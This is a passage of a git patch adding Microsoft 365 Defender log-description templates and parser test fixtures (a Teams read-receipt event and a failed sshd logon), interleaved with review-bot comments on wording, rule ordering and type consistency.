@@ -389,16 +389,16 @@ gatewatcher.tls: name: gatewatcher.tls type: text -gatewatcher.tls_sni: - description: This field represents the TLS SNI field in a TLS metadata - name: gatewatcher.tls_sni - type: text - gatewatcher.tls_fingerprint: description: This field represents the TLS server fingerprint field in a TLS metadata name: gatewatcher.tls_fingerprint type: text +gatewatcher.tls_sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls_sni + type: text + gatewatcher.ttp: description: This field is used for retrohunt alerts name: gatewatcher.ttp From 97df6b20679a01fb368a3a46dc440ef564086d46 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 12:07:17 +0100 Subject: [PATCH 088/150] Microsoft 365 defender : fix on smart descriptions --- .../_meta/smart-descriptions.json | 61 ++++++++++++ .../tests/test_cloud_app4.json | 63 ++++++++++++ .../tests/test_device_logon_failed.json | 98 +++++++++++++++++++ .../tests/test_email_delivered.json | 76 ++++++++++++++ .../tests/test_email_delivered2.json | 76 ++++++++++++++ 5 files changed, 374 insertions(+) create mode 100644 Microsoft/microsoft-365-defender/tests/test_cloud_app4.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_delivered.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_delivered2.json diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 21e3caf3c..6232e66f8 100644 --- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json 
@@ -1,4 +1,14 @@
 [
+ {
+ "value": "A new {action.type} cloud app event have been received",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "cloud_app_events"
+ },
+ { "field": "action.type" }
+ ]
+ },
 {
 "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}",
 "conditions": [
@@ -132,6 +142,35 @@
 }
 ]
 },
+ {
+ "value": "{user.domain}\\{user.name} failed to log on {host.name}",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "device_logon_events"
+ },
+ {
+ "field": "host.name"
+ },
+ {
+ "field": "user.name"
+ },
+ {
+ "field": "user.domain"
+ },
+ {
+ "field": "action.type",
+ "value": "LogonFailed"
+ }
+ ],
+ "relationships": [
+ {
+ "source": "user.name",
+ "target": "host.name",
+ "type": "logged on"
+ }
+ ]
+ },
 {
 "value": "{user.domain}\\{user.name} logged on {host.name}",
 "conditions": [
@@ -402,6 +441,28 @@
 { "field": "email.to.address" }
 ]
 },
+ {
+ "value": "{event.action} email from {email.from.address} to {email.to.address}",
+ "conditions": [
+ { "field": "event.dataset", "value": "email_events" },
+ { "field": "email.from.address" },
+ { "field": "email.to.address" }
+ ]
+ },
+ {
+ "value": "{event.action} email from {email.from.address}",
+ "conditions": [
+ { "field": "event.dataset", "value": "email_events" },
+ { "field": "email.from.address" }
+ ]
+ },
+ {
+ "value": "{event.action} email to {email.to.address}",
+ "conditions": [
+ { "field": "event.dataset", "value": "email_events" },
+ { "field": "email.to.address" }
+ ]
+ },
 {
 "value": "{action.type} on {url.original}",
 "conditions": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json
new file mode 100644
index 000000000..86f044fe7
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json
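Review bot: The new description string `"A new {action.type} cloud app event have been received"` has a subject–verb disagreement; it should read `"A new {action.type} cloud app event has been received"`. The entry is also inserted at the very top of the list with only `event.dataset == cloud_app_events` and the presence of `action.type` as conditions, so if entries are evaluated first-match in order it will shadow any more specific `cloud_app_events` description further down the file. Placing it after the specific entries, or adding a narrowing condition, avoids that.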
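Review bot: The `relationships` entry of the new `LogonFailed` description uses `"type": "logged on"`, the same relationship type as the existing `logged on {host.name}` entry that follows it, so a failed attempt would be rendered as an established session by anything that consumes relationships. For consistency with the `value` template two lines above it should be `"type": "failed to log on"` (or whatever vocabulary the relationship consumer expects for unsuccessful attempts).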
@@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":
[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John 
DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "network" + ], + "dataset": "cloud_app_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "Application": "Microsoft Teams", + "ApplicationId": "28375", + "IsAdminOperation": "false", + "IsExternalUser": false, + "IsImpersonated": false, + "RawEventData": 
"{\"ChatThreadId\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"CommunicationType\": \"GroupChat\", \"CreationTime\": \"2024-10-28T14:18:38Z\", \"ExtraProperties\": [], \"Id\": \"abcd1234-ef09-1234-abcd-123456abcdef\", \"ItemName\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"MessageId\": \"1730125116564\", \"MessageVersion\": \"0\", \"MessageVisibilityTime\": \"2022-09-21T08:33:35Z\", \"Operation\": \"MessageReadReceiptReceived\", \"OrganizationId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"12345678-abcd-ef09-1234-123456abcdef\"]}, \"RecordType\": 25, \"ResourceTenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"UserId\": \"john.doe@company.fr\", \"UserKey\": \"abcd1234-1234-1234-1234-abcdef123456\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\"}" + }, + "type": "MessageReadReceiptReceived" + }, + "microsoft": { + "defender": { + "activity": { + "objects": [ + { + "Role": "Parameter", + "ServiceObjectType": "Microsoft Team", + "Type": "Structured object" + }, + { + "ApplicationId": 11161, + "ApplicationInstance": 0, + "Id": "abcd1234-1234-1234-1234-abcdef123456", + "Name": "John DOE", + "Role": "Actor", + "Type": "User" + } + ], + "type": "Basic" + }, + "report": { + "id": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef" + } + } + }, + "user": { + "full_name": "John DOE" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json new file mode 100644 index 000000000..1d69ebb63 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json 
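Review bot: The expected block pins mixed scalar types for sibling keys under `action.properties`: `"ApplicationId": "28375"` and `"IsAdminOperation": "false"` are strings while `"IsExternalUser": false` and `"IsImpersonated": false` stay booleans, although all four are numbers or booleans in the input message. A fixture freezes that behaviour, so if the stringification is not deliberate the parser (outside this commit) is the place to fix it before asserting it here; `"EmailClusterId": "3162398878"` in test_email_delivered.json later in this commit pins the same kind of conversion. If it is deliberate, a sentence in the commit description saying so would spare the next reader the same question.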
@@ -0,0 +1,98 @@ +{ + "input": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 
-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, 
\"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": 
\"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", 
\"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "device_logon_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-18T10:07:22.681617Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc 
-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "InitiatingProcessFileSize": 890528, + "LogonType": "Network", + "RemoteIPType": "Private" + }, + "type": "LogonFailed" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "domain" + }, + "microsoft": { + "defender": { + "report": { + "id": "413706" + } + } + }, + "process": { + "args": [ + "-D", + "-R", + 
"-oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa", + "-oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc", + "-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1-", + "-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com", + "-oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1", + "-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512", + "-oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com" + ], + "command_line": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc 
